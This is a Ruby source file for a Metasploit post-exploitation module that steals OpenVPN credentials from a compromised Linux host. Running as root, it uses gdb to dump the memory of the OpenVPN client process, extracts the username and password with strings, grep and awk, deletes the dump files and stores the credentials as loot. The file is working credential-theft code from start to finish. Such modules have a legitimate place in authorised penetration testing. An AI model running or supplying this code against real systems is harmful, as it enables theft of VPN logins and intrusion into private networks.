metasploit-framework/modules/post/linux/gather/openvpn_credentials.rb

90 lines
2.7 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenVPN Gather Credentials',
'Description' => %q{
This module grab OpenVPN credentials from a running process
in Linux.
Note: --auth-nocache must not be set in the OpenVPN command line.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rvrsh3ll', # Discovery
'Roberto Soares Espreto <robertoespreto[at]gmail.com>', # Metasploit Module
],
'Platform' => ['linux'],
'SessionTypes' => ['shell', 'meterpreter'],
'References' => [
['URL', 'https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh']
]
))
register_options(
[
OptInt.new('PID', [true, 'Process IDentifier to OpenVPN client.']),
OptString.new('TMP_PATH', [true, 'The path to the directory to save dump process', '/tmp/'])
], self.class
)
end
def pid
datastore['PID']
end
def tmp_path
datastore['TMP_PATH']
end
def run
user = cmd_exec('/usr/bin/whoami')
print_good("Module running as \"#{user}\" user")
unless is_root?
print_error('This module requires root permissions.')
return
end
dump = cmd_exec('/bin/grep rw-p /proc/'"#{pid}"'/maps | sed -n \'s/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p\' | while read start stop; do /usr/bin/gdb --batch-silent --silent --pid '"#{pid}"' -ex "dump memory '"#{tmp_path}#{pid}"'-$start-$stop.dump 0x$start 0x$stop"; done 2>/dev/null; echo $?')
if dump.chomp.to_i == 0
vprint_good('Succesfully dump.')
else
print_warning('Could not dump process.')
return
end
strings = cmd_exec("/usr/bin/strings #{tmp_path}*.dump | /bin/grep -B2 KnOQ | /bin/grep -v KnOQ | /usr/bin/column | /usr/bin/awk '{print \"User: \"$1\"\\nPass: \"$2}'")
deldump = cmd_exec("/bin/rm #{tmp_path}*.dump --force 2>/dev/null; echo $?")
if deldump.chomp.to_i == 0
vprint_good('Removing temp files successfully.')
else
print_warning('Could not remove dumped files. Remove manually.')
end
fail_with(Failure::BadConfig, 'No credentials. You can check if the PID is correct.') if strings.empty?
vprint_good("OpenVPN Credentials:\n#{strings}")
p = store_loot(
'openvpn.grab',
'text/plain',
session,
strings,
nil
)
print_status("OpenVPN Credentials stored in #{p}")
end
end